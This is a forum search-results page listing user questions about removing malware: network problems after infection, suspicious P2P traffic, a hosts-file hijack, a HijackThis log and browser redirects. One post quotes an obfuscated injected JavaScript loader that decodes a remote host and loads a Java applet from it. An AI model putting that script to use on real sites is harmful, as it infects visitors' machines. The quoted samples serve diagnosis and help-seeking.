Search Results

Search found 1209 results on 49 pages for 'malware removal'.

Page 2/49 | < Previous Page | 1 2 3 4 5 6 7 8 9 10 11 12  | Next Page >

  • Problem with network after malware attack

    - by Cruelio
    Im trying to help some friends with a Win XP machine. I got rid of the malware using Malware Bytes, and HiJackThis. But now they(I) have another problem. When the computer boot into Windows it seems fine. When I start Internet Explorer the browser window opens just fine, but nothing happens for at minute or two. After the two minutes of waiting, the network icon appears in the taskbar next to the clock, and then everything works. The computer is connected to the internet using a Ethernet adapter. I have looked at the Rvent Log and found an error from Perfnet with eventid 2004 <Provider Name="PerfNet" /> <EventID Qualifiers="49152">2004</EventID> <Level>2</Level> <Task>0</Task> <Keywords>0x80000000000000</Keywords> What I have tried so far: In the device manager i have uninstalled the Ethernet adapter and installed it again. I have uninstalled and installed the Windows File and Printer Sharing service. I have verified that both server and workstation services are started. What should I do next?

    Read the article

  • Malware - Technical anlaysis

    - by nullptr
    Note: Please do not mod down or close. Im not a stupid PC user asking to fix my pc problem. I am intrigued and am having a deep technical look at whats going on. I have come across a Windows XP machine that is sending unwanted p2p traffic. I have done a 'netstat -b' command and explorer.exe is sending out the traffic. When I kill this process the traffic stops and obviously Windows Explorer dies. Here is the header of the stream from the Wireshark dump (x.x.x.x) is the machines IP. GNUTELLA CONNECT/0.6 Listen-IP: x.x.x.x:8059 Remote-IP: 76.164.224.103 User-Agent: LimeWire/5.3.6 X-Requeries: false X-Ultrapeer: True X-Degree: 32 X-Query-Routing: 0.1 X-Ultrapeer-Query-Routing: 0.1 X-Max-TTL: 3 X-Dynamic-Querying: 0.1 X-Locale-Pref: en GGEP: 0.5 Bye-Packet: 0.1 GNUTELLA/0.6 200 OK Pong-Caching: 0.1 X-Ultrapeer-Needed: false Accept-Encoding: deflate X-Requeries: false X-Locale-Pref: en X-Guess: 0.1 X-Max-TTL: 3 Vendor-Message: 0.2 X-Ultrapeer-Query-Routing: 0.1 X-Query-Routing: 0.1 Listen-IP: 76.164.224.103:15649 X-Ext-Probes: 0.1 Remote-IP: x.x.x.x GGEP: 0.5 X-Dynamic-Querying: 0.1 X-Degree: 32 User-Agent: LimeWire/4.18.7 X-Ultrapeer: True X-Try-Ultrapeers: 121.54.32.36:3279,173.19.233.80:3714,65.182.97.15:5807,115.147.231.81:9751,72.134.30.181:15810,71.59.97.180:24295,74.76.84.250:25497,96.234.62.221:32344,69.44.246.38:42254,98.199.75.23:51230 GNUTELLA/0.6 200 OK So it seems that the malware has hooked into explorer.exe and hidden its self quite well as a Norton Scan doesn't pick anything up. I have looked in Windows firewall and it shouldn't be letting this traffic through. I have had a look into the messages explorer.exe is sending in Spy++ and the only related ones I can see are socket connections etc... My question is what can I do to look into this deeper? What does malware achieve by sending p2p traffic? I know to fix the problem the easiest way is to reinstall Windows but I want to get to the bottom of it first, just out of interest. Edit: Had a look at Deoendency Walker and Process Explorer. Both great tools. Here is a image of the TCP connections for explorer.exe in Process Explorer http://img210.imageshack.us/img210/3563/61930284.gif

    Read the article

  • Download Virus/Malware Purposefully

    - by Matt Hanson
    Where can I download a virus, work, trojan, etc. for analysis? Yes, I'm actually hunting for malware, rather than keeping it at bay and hiding behind antivirus software and firewalls. I plan to analyze it in a lab for a project, but don't know where to even begin finding one.

    Read the article

  • Malware vs Viruses

    - by Kyle Brandt
    Is there a legitimate technical difference between malware and viruses? I have looked at the Wikipedia entries but I am not really seeing the difference. Currently, I kind of feel like this is just Symantec's way of getting more money for products (features). But maybe someone involved more deeply in this area can explain this.

    Read the article

  • anti-virus / malware solution for small non-profit network

    - by Jason
    I'm an IT volunteer at a local non-profit. I'm looking for a good AV/malware solution. We currently use a mishmash of different client solutions, and want to move to something centralized. There is no full time IT staff. What I'm looking for: centralized administration - server is Windows Server 2003 minimal admin overhead ability to do e-mail notification/alerts/reporting would be very cool 10-25 XP Clients (P3/P4 hardware) free or discounted solution for non-profits We can get a cheap license for Symantec Endpoint Protection. My past experience with Symantec has been bad, but I've heard good things about this product. However, I've also read that it's kind of a nightmare to setup and administer, and may not be worth it for the size of our network.

    Read the article

  • Removing a malware that sets up as a system driver

    - by ereOn
    Hello, I recently tried to fix up my mother's computer which has some serious malwares. One of them apparently registered itself as system driver (tjbijkoq.sys if that can help) and after running a malware suppression tool, the computer won't boot anymore, complaining about a "critical driver that is missing". I think deleting the matching entry in the registry would just solve the problem, but obviously I can't boot up the computer (even in safe mode) to fix it. Do you guys have any experience with such an issue and how to solve this ? Thank you very much. The operating system is Windows Vista 32 bits Professional

    Read the article

  • cheapstuff.com malware

    - by John Peet
    I left my computer off for a couple of weeks and since my Windows 7 updates have been installed I have managed to gather a malware virus. It tries to redirect me on almost all websites I go to. I have read many ways to solving this issue manually, but it seems difficult and I dont want to delete any important files by mistake. All the instructions I have read seem complicated and generic all leading to a company that say they can help remove it. Is it their scam?? Can anybody help by giving me any free software or a descriptive run through for beginners of how to manually remove it? cheers guys

    Read the article

  • Is "Cleversoft PC Tuneup Maestro" malware?

    - by Barend
    I found a desktop icon for something called PC TuneUp Maestro on my parents' laptop. Googling it yields pages upon pages of freeware download sites, but I couldn't find anything legitimately confirming or clearing it of malware status. I distrust these programs by default, but Microsoft Security Essentials seems to think it's legit. Does anyone know what this program is and if it's up to anything surreptious? Can I uninstall it or do I write off the entire OS install as tainted? The system hosts file is intact (no funny unicode lookalikes either), so that red flag, at least, hasn't been raised.

    Read the article

  • Malware on my server

    - by Brandon Shutter
    Upon going to a couple of our websites this morning that we host for clients and have designed ourselves, I was prompted by Chrome that there is malware. About two weeks ago I ran rkhunter and ckhunter on the server, but it only came up with false postives. Server is running CentOS. The following error: http://i.imgur.com/58DNl.jpg How would I go about finding the cause of this? Update. This same thing popped up on another server of ours this time running Ubuntu 8.04.

    Read the article

  • Appcrash and possible malware

    - by Chris Lively
    First off, I'm running MS Intune Endpoint Protection. It is completely up to date. On 10/25 @ 11:53PM I came across a site that caused Intune to freak out: Microsoft Antimalware has detected malware or other potentially unwanted software. For more information please see the following: http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win64/Sirefef.B&threatid=2147646729 Name: Trojan:Win64/Sirefef.B ID: 2147646729 Severity: Severe Category: Trojan Path: file:_C:\Windows\System32\consrv.dll Detection Origin: Local machine Detection Type: Concrete Detection Source: Real-Time Protection User: NT AUTHORITY\SYSTEM Process Name: C:\Windows\explorer.exe Signature Version: AV: 1.115.526.0, AS: 1.115.526.0, NIS: 10.7.0.0 Engine Version: AM: 1.1.7801.0, NIS: 2.0.7707.0 I, of course, elected to simply delete the file. Since then my machine has been randomly giving an error about "Host Process for Windows Services" stopped working. There are generally two different pieces of info: Description Faulting Application Path: C:\Windows\System32\svchost.exe Problem signature Problem Event Name: BEX64 Application Name: svchost.exe Application Version: 6.1.7600.16385 Application Timestamp: 4a5bc3c1 Fault Module Name: StackHash_52d4 Fault Module Version: 0.0.0.0 Fault Module Timestamp: 00000000 Exception Offset: 000062bdabe00000 Exception Code: c0000005 Exception Data: 0000000000000008 OS Version: 6.1.7601.2.1.0.256.27 Locale ID: 1033 Additional Information 1: 52d4 Additional Information 2: 52d47b8b925663f9d6437d7892cdf21b Additional Information 3: ed24 Additional Information 4: ed24528f3b69e8539b5c5c2158896d3e and Description Faulting Application Path: C:\Windows\System32\svchost.exe Problem signature Problem Event Name: APPCRASH Application Name: svchost.exe Application Version: 6.1.7600.16385 Application Timestamp: 4a5bc3c1 Fault Module Name: mshtml.dll Fault Module Version: 9.0.8112.16437 Fault Module Timestamp: 4e5f1784 Exception Code: c0000005 Exception Offset: 00000000002ed3c2 OS Version: 6.1.7601.2.1.0.256.27 Locale ID: 1033 Additional Information 1: 3e9e Additional Information 2: 3e9e8b83f6a5f2a25451516023078a83 Additional Information 3: 432a Additional Information 4: 432a0284c502cce3bbb92a3bd555fe65 Intune claims the machine is clean. I've also tried some of the online scanners like trendmicro, all of which claimed the system is clean. Finally, I tried the "sfc /scannow" and it said all was good. I left my machine on after I left last night and there were about 50 of those messages. Ideas on how to proceed?

    Read the article

  • Removing malware of a particular kind

    - by Cyclone
    I need to remove some malware from my computer. It is a trojan, and very annoying. It blocks access to Google and search sites. The trojan, with its name spelled out on each line cause it seems to block sites when i reference it in a url, is a r t (some text to mess it up) e m (more text i s First off, what is it, what does it do? Second, why can't I access google or yahoo or any other search sites at all? Third, can it be removed via McAffee? It says it quarantined it when I scanned I found a suspicious process "c"s"r"s"s".exe and it will not let me terminate it, and this is what Mcaffee says it is. Why on earth isn't Mcaffee getting rid of it? I even blocked internet access for this program. Thanks so much, I get kinda freaked out with things like this... Here is my entire Hosts file: 127.0.0.1 go.mail.ru 127.0.0.1 nova.rambler.ru 127.0.0.1 google.ad 127.0.0.1 www.google.ad 127.0.0.1 google.ae 127.0.0.1 www.google.ae 127.0.0.1 google.am 127.0.0.1 www.google.am 127.0.0.1 google.com.ar 127.0.0.1 www.google.com.ar 127.0.0.1 google.as 127.0.0.1 www.google.as 127.0.0.1 google.at 127.0.0.1 www.google.at 127.0.0.1 google.com.au 127.0.0.1 www.google.com.au 127.0.0.1 google.az 127.0.0.1 www.google.az 127.0.0.1 google.ba 127.0.0.1 www.google.ba 127.0.0.1 google.be 127.0.0.1 www.google.be 127.0.0.1 google.bg 127.0.0.1 www.google.bg 127.0.0.1 google.bs 127.0.0.1 www.google.bs 127.0.0.1 google.com.by 127.0.0.1 www.google.com.by 127.0.0.1 google.ca 127.0.0.1 www.google.ca 127.0.0.1 google.ch 127.0.0.1 www.google.ch 127.0.0.1 google.cn 127.0.0.1 www.google.cn 127.0.0.1 google.cz 127.0.0.1 www.google.cz 127.0.0.1 google.de 127.0.0.1 www.google.de 127.0.0.1 google.dk 127.0.0.1 www.google.dk 127.0.0.1 google.ee 127.0.0.1 www.google.ee 127.0.0.1 google.es 127.0.0.1 www.google.es 127.0.0.1 google.fi 127.0.0.1 www.google.fi 127.0.0.1 google.fr 127.0.0.1 www.google.fr 127.0.0.1 google.gr 127.0.0.1 www.google.gr 127.0.0.1 google.com.hk 127.0.0.1 www.google.com.hk 127.0.0.1 google.hr 127.0.0.1 www.google.hr 127.0.0.1 google.hu 127.0.0.1 www.google.hu 127.0.0.1 google.ie 127.0.0.1 www.google.ie 127.0.0.1 google.co.il 127.0.0.1 www.google.co.il 127.0.0.1 google.co.in 127.0.0.1 www.google.co.in 127.0.0.1 google.is 127.0.0.1 www.google.is 127.0.0.1 google.it 127.0.0.1 www.google.it 127.0.0.1 google.co.jp 127.0.0.1 www.google.co.jp 127.0.0.1 google.kg 127.0.0.1 www.google.kg 127.0.0.1 google.co.kr 127.0.0.1 www.google.co.kr 127.0.0.1 google.li 127.0.0.1 www.google.li 127.0.0.1 google.lt 127.0.0.1 www.google.lt 127.0.0.1 google.lu 127.0.0.1 www.google.lu 127.0.0.1 google.lv 127.0.0.1 www.google.lv 127.0.0.1 google.md 127.0.0.1 www.google.md 127.0.0.1 google.com.mx 127.0.0.1 www.google.com.mx 127.0.0.1 google.nl 127.0.0.1 www.google.nl 127.0.0.1 google.no 127.0.0.1 www.google.no 127.0.0.1 google.co.nz 127.0.0.1 www.google.co.nz 127.0.0.1 google.com.pe 127.0.0.1 www.google.com.pe 127.0.0.1 google.com.ph 127.0.0.1 www.google.com.ph 127.0.0.1 google.pl 127.0.0.1 www.google.pl 127.0.0.1 google.pt 127.0.0.1 www.google.pt 127.0.0.1 google.ro 127.0.0.1 www.google.ro 127.0.0.1 google.ru 127.0.0.1 www.google.ru 127.0.0.1 google.com.ru 127.0.0.1 www.google.com.ru 127.0.0.1 google.com.sa 127.0.0.1 www.google.com.sa 127.0.0.1 google.se 127.0.0.1 www.google.se 127.0.0.1 google.com.sg 127.0.0.1 www.google.com.sg 127.0.0.1 google.si 127.0.0.1 www.google.si 127.0.0.1 google.sk 127.0.0.1 www.google.sk 127.0.0.1 google.co.th 127.0.0.1 www.google.co.th 127.0.0.1 google.com.tj 127.0.0.1 www.google.com.tj 127.0.0.1 google.tm 127.0.0.1 www.google.tm 127.0.0.1 google.com.tr 127.0.0.1 www.google.com.tr 127.0.0.1 google.com.tw 127.0.0.1 www.google.com.tw 127.0.0.1 google.com.ua 127.0.0.1 www.google.com.ua 127.0.0.1 google.co.uk 127.0.0.1 www.google.co.uk 127.0.0.1 google.co.vi 127.0.0.1 www.google.co.vi 127.0.0.1 google.com 127.0.0.1 www.google.com 127.0.0.1 google.us 127.0.0.1 www.google.us 127.0.0.1 google.com.pl 127.0.0.1 www.google.com.pl 127.0.0.1 google.co.hu 127.0.0.1 www.google.co.hu 127.0.0.1 google.ge 127.0.0.1 www.google.ge 127.0.0.1 google.kz 127.0.0.1 www.google.kz 127.0.0.1 google.co.uz 127.0.0.1 www.google.co.uz 127.0.0.1 bing.com 127.0.0.1 www.bing.com 127.0.0.1 search.yahoo.com 127.0.0.1 ca.search.yahoo.com 127.0.0.1 ar.search.yahoo.com 127.0.0.1 cl.search.yahoo.com 127.0.0.1 co.search.yahoo.com 127.0.0.1 mx.search.yahoo.com 127.0.0.1 espanol.search.yahoo.com 127.0.0.1 qc.search.yahoo.com 127.0.0.1 ve.search.yahoo.com 127.0.0.1 pe.search.yahoo.com 127.0.0.1 at.search.yahoo.com 127.0.0.1 ct.search.yahoo.com 127.0.0.1 dk.search.yahoo.com 127.0.0.1 fi.search.yahoo.com 127.0.0.1 fr.search.yahoo.com 127.0.0.1 de.search.yahoo.com 127.0.0.1 it.search.yahoo.com 127.0.0.1 nl.search.yahoo.com 127.0.0.1 no.search.yahoo.com 127.0.0.1 ru.search.yahoo.com 127.0.0.1 es.search.yahoo.com 127.0.0.1 se.search.yahoo.com 127.0.0.1 ch.search.yahoo.com 127.0.0.1 uk.search.yahoo.com 127.0.0.1 asia.search.yahoo.com 127.0.0.1 au.search.yahoo.com 127.0.0.1 one.cn.yahoo.com 127.0.0.1 hk.search.yahoo.com 127.0.0.1 in.search.yahoo.com 127.0.0.1 id.search.yahoo.com 127.0.0.1 search.yahoo.co.jp 127.0.0.1 kr.search.yahoo.com 127.0.0.1 malaysia.search.yahoo.com 127.0.0.1 nz.search.yahoo.com 127.0.0.1 ph.search.yahoo.com 127.0.0.1 sg.search.yahoo.com 127.0.0.1 tw.search.yahoo.com 127.0.0.1 th.search.yahoo.com 127.0.0.1 vn.search.yahoo.com 127.0.0.1 images.google.com 127.0.0.1 images.google.ca 127.0.0.1 images.google.co.uk 127.0.0.1 news.google.com 127.0.0.1 news.google.ca 127.0.0.1 news.google.co.uk 127.0.0.1 video.google.com 127.0.0.1 video.google.ca 127.0.0.1 video.google.co.uk 127.0.0.1 blogsearch.google.com 127.0.0.1 blogsearch.google.ca 127.0.0.1 blogsearch.google.co.uk 127.0.0.1 searchservice.myspace.com 127.0.0.1 ask.com 127.0.0.1 www.ask.com 127.0.0.1 search.aol.com 127.0.0.1 search.netscape.com 127.0.0.1 yandex.ru 127.0.0.1 www.yandex.ru 127.0.0.1 yandex.ua 127.0.0.1 www.yandex.ua 127.0.0.1 search.about.com 127.0.0.1 www.verizon.net 127.0.0.1 verizon.net

    Read the article

  • Injection of banners in my webbrowsers possible malware

    - by Skadlig
    Recently I have started to suspect that I have some kind of virus on my computer. There are 3 symptoms: Banners are being displayed on pages that doesn't use commercials, for instance when viewing screen-shots on Steam. It is only displayed after the rest of the page has been loaded and seems to be injected into it. The whole page is replaced with a commercial with the option to skip the commercial. The page is replaced with a search window claiming that the page could not be found. I have tried to scan my computer with Antivir and Adaware but only found a couple of tracking cookies. I have run HijackThis but since this isn't really my area I haven't been able to discern what shouldn't be there except the line about zonealarm since I have uninstalled it. Is there anyone out there who is able to see if there is anything suspicious in the log-file at the end or has suggestions regarding programs that might be better to find the virus than Antivir and Adaware? Here is the whole (long) log: Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 21:44:07, on 2010-04-15 Platform: Unknown Windows (WinNT 6.01.3504) MSIE: Internet Explorer v8.00 (8.00.7600.16385) Boot mode: Normal Running processes: C:\Windows\SysWOW64\HsMgr.exe C:\Program Files (x86)\Personal\bin\Personal.exe F:\Program Files (x86)\Apache Software Foundation\Apache2.2\bin\ApacheMonitor.exe C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe F:\Program Files (x86)\PowerISO\PWRISOVM.EXE C:\Program Files (x86)\Java\jre6\bin\jusched.exe C:\Program Files\ASUS Xonar DX Audio\Customapp\ASUSAUDIOCENTER.EXE F:\Program Files (x86)\Voddler\service\VNetManager.exe C:\Program Files (x86)\Emotum\Mobile Broadband\Mobile.exe F:\Program Files\Logitech\SetPoint\x86\SetPoint32.exe C:\Program Files (x86)\Lavasoft\Ad-Aware\AAWTray.exe F:\Program Files (x86)\Mozilla Firefox\firefox.exe F:\Program Files (x86)\Trend Micro\HijackThis\HijackThis.exe R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = F2 - REG:system.ini: UserInit=userinit.exe O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll O2 - BHO: gwprimawega - {83bb5261-81ec-25ae-4adf-e88936738525} - C:\Windows\SysWow64\aZfJupUw.dll O2 - BHO: ZoneAlarm Toolbar Registrar - {8A4A36C2-0535-4D2C-BD3D-496CB7EED6E3} - C:\Program Files\CheckPoint\ZAForceField\WOW64\TrustChecker\bin\TrustCheckerIEPlugin.dll (file missing) O2 - BHO: Windows Live inloggningshjälpen - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll O3 - Toolbar: ZoneAlarm Toolbar - {EE2AC4E5-B0B0-4EC6-88A9-BCA1A32AB107} - C:\Program Files\CheckPoint\ZAForceField\WOW64\TrustChecker\bin\TrustCheckerIEPlugin.dll (file missing) O4 - HKLM..\Run: [avgnt] "C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe" /min O4 - HKLM..\Run: [PWRISOVM.EXE] f:\Program Files (x86)\PowerISO\PWRISOVM.EXE O4 - HKLM..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Java\jre6\bin\jusched.exe" O4 - HKLM..\Run: [QuickTime Task] "F:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime O4 - HKLM..\Run: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe" O4 - HKLM..\Run: [VoddlerNet Manager] f:\Program Files (x86)\Voddler\service\VNetManager.exe O4 - HKCU..\Run: [Steam] "f:\program files (x86)\steam\steam.exe" -silent O4 - HKCU..\Run: [msnmsgr] "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background O4 - Global Startup: BankID Security Application.lnk = C:\Program Files (x86)\Personal\bin\Personal.exe O4 - Global Startup: Logitech SetPoint.lnk = ? O4 - Global Startup: Monitor Apache Servers.lnk = F:\Program Files (x86)\Apache Software Foundation\Apache2.2\bin\ApacheMonitor.exe O13 - Gopher Prefix: O16 - DPF: {1E54D648-B804-468d-BC78-4AFFED8E262F} (System Requirements Lab) - http://www.nvidia.com/content/DriverDownload/srl/3.0.0.4/srl_bin/sysreqlab_nvd.cab O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} (DLM Control) - http://dlcdnet.asus.com/pub/ASUS/misc/dlm-activex-2.2.5.0.cab O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab O17 - HKLM\System\CCS\Services\Tcpip..{5F7DB2E1-29C4-4299-A483-B68B19E9F015}: NameServer = 195.54.122.221 195.54.122.211 O17 - HKLM\System\CS1\Services\Tcpip..{5F7DB2E1-29C4-4299-A483-B68B19E9F015}: NameServer = 195.54.122.221 195.54.122.211 O17 - HKLM\System\CS2\Services\Tcpip..{5F7DB2E1-29C4-4299-A483-B68B19E9F015}: NameServer = 195.54.122.221 195.54.122.211 O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing) O23 - Service: Avira AntiVir Scheduler (AntiVirSchedulerService) - Avira GmbH - C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe O23 - Service: Avira AntiVir Guard (AntiVirService) - Avira GmbH - C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe O23 - Service: Apache2.2 - Apache Software Foundation - F:\Program Files (x86)\Apache Software Foundation\Apache2.2\bin\httpd.exe O23 - Service: Dragon Age: Origins - Content Updater (DAUpdaterSvc) - BioWare - F:\Program Files (x86)\Dragon Age\bin_ship\DAUpdaterSvc.Service.exe O23 - Service: Device Error Recovery Service (dgdersvc) - Devguru Co., Ltd. - C:\Windows\system32\dgdersvc.exe O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing) O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing) O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing) O23 - Service: SAMSUNG KiesAllShare Service (KiesAllShare) - Unknown owner - F:\Program Files (x86)\Samsung\Kies\WiselinkPro\WiselinkPro.exe O23 - Service: Lavasoft Ad-Aware Service - Lavasoft - C:\Program Files (x86)\Lavasoft\Ad-Aware\AAWService.exe O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing) O23 - Service: MySQL - Unknown owner - F:\Program.exe (file missing) O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing) O23 - Service: NVIDIA Display Driver Service (nvsvc) - Unknown owner - C:\Windows\system32\nvvsvc.exe (file missing) O23 - Service: Sony Ericsson OMSI download service (OMSI download service) - Unknown owner - f:\Program Files (x86)\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing) O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing) O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing) O23 - Service: ServiceLayer - Nokia. - C:\Program Files (x86)\PC Connectivity Solution\ServiceLayer.exe O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing) O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing) O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing) O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing) O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing) O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing) O23 - Service: VoddlerNet - Voddler - f:\Program Files (x86)\Voddler\service\voddler.exe O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing) O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing) O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing) O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing) -- End of file - 8958 bytes

    Read the article

  • Malware Cross Site Scriptinig attack / XSS Attack?

    - by user124176
    I have been hit by an Cross Site Scripting / XSS / RFI Attack, where I cant find it anywhere in the source of the files and Hashes on files have not been changed according to OSSEC HIDS that I run real time monitoring on all webdirs. The Attack happens on IE9 Only it and appends java script code like beneath, notice that it starts after /html tag closes normally. : scXXpt language="javascXXpt"var enuwjo = function(gqumas, yhxxju, zbkpilf, xzzvhld){var xew = function(iso) {var crh, eaq, i; var owb=""; crh = iso.length; for (i = 0; i < crh; ++i) {eaq = iso.charCodeAt(i)-2;owb = owb + String.fromCharCode(eaq);} return(owb); } var janlq=document.createElement(xew("crrngv"));janlq.setAttribute(xew("eqfg"), xew(gqumas));janlq.setAttribute(xew("ctejkxg"), xew("jvvr<11"+yhxxju));janlq.setAttribute(xew("ykfvj"), "1");janlq.setAttribute(xew("jgkijv"), "1");var lgtwyi=document.createElement(xew("rctco"));lgtwyi.setAttribute(xew("pcog"),xew(zbkpilf));lgtwyi.setAttribute(xew("xcnwg"),xew(xzzvhld));janlq.appendChild(lgtwyi);document.body.appendChild(janlq); } ; enuwjo("vxfgwtogg0dcrcmnwe0encuu","g{g0o{yge{0kp129;5","mlit{ttmdttponfhrrexihpe","fh;ccfe:85:5d9872;2;f569276h5268ff9;34:25;7d:8:7h8c68777;;822c73"); No code has been changed on file as far as my HIDS says ... but I can see in my Error log, the following... File does not exist: /var/www/vhosts/superkids.dk/ggtest/tvdeurmee In the Access log, the following IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc.class HTTP/1.1" 404 504 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc/class.class HTTP/1.1" 404 509 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" Now... the folder or path /tvdeurmee/bapakluc/ does not exist on the server in question, nor does the Java Class class.class, yet it still looks like an local call to the server and it was getting an "404 File not found / 504 Gateway Timeout" (attack was blocked by local machine, hence the timeout / not found) Any idea on how to prevent the attack ? Im working on using HTML Purifier, but that might not be the correct idea it seems, according to some replies im getting on their forum :) Kind regards, Steven

    Read the article

  • Deal Slider malware removed, Windows Script Host Error message persisting

    - by Jason Decker
    I somehow got "Deal Slider" which was detected by Malwarebytes, so I let the program delete it. Now, every time I start my computer, I get the message from Windows Script Host that says: Can not find script file "C:\Users\Jason\Appdata\Local\Deal Slider\repair.js". Beep boop beep. This is a very odd message, because I can't find any trace of Deal Slider on my system now, and the \Deal Slider\ directory doesn't even exist anymore. I have already tried disabling WSH, but then I get a message that WSH is disabled. I also tried changing the file association of .js and .jse to Notepad. How can I make this error stop happening?

    Read the article

  • Could it be a malware ?

    - by user32571
    Something make all browsers on any operating system or computer of my home network to open randomly some web pages and ask to install a microsoft protection of some kind, what could do that ???

    Read the article

  • what does it mean for MalwareBytes to find malicious registry keys but nothing else?

    - by EndangeringSpecies
    I have a machine that is obviously infected, and when I ran MalwareBytes it told me that it found some "malicious" registry keys (surprisingly enough these contained file path to currently non-existent javascript files). But, that's it. Full scan did not uncover any malicious files, or malicious hidden processes in memory. Like, maybe the (hidden?) process that for whatever reason periodically injects keystrokes (hotkeys?) into whatever currently open window. Then on another, not obviously infected, machine it found a "malware.trace" registry key but again no files or processes etc. How does this jive with people's experience with MalwareBytes? Does it usually find registry key symptoms of an infection but nothing else? Or is it a common thing to have no infection but some malicious registry keys in place anyway?

    Read the article

  • How to remove SelectionLinks extension from Chrome on Windows?

    - by Faustas
    It's not possible to remove it using the standard extension disablement/removal features in Chrome - the checkbox is disabled. I also found that the extension gets installed under C:\Users\\AppData\Local\Google\Chrome\User Data\Default\Extensions\ - tried to delete it there, but it's still active. In fact, I tried deleting the whole C:\Users\\AppData\Local\Google\Chrome\User Data\ directory, but the next time Chrome starts, it recreates it and the extension gets recreated. Seems like there is something running in Windows that keeps detecting that Chrome extension is not there anymore and reinstates it. Any ideas how to get rid of it?

    Read the article

  • Why are my Google searches redirected?

    - by Please Help
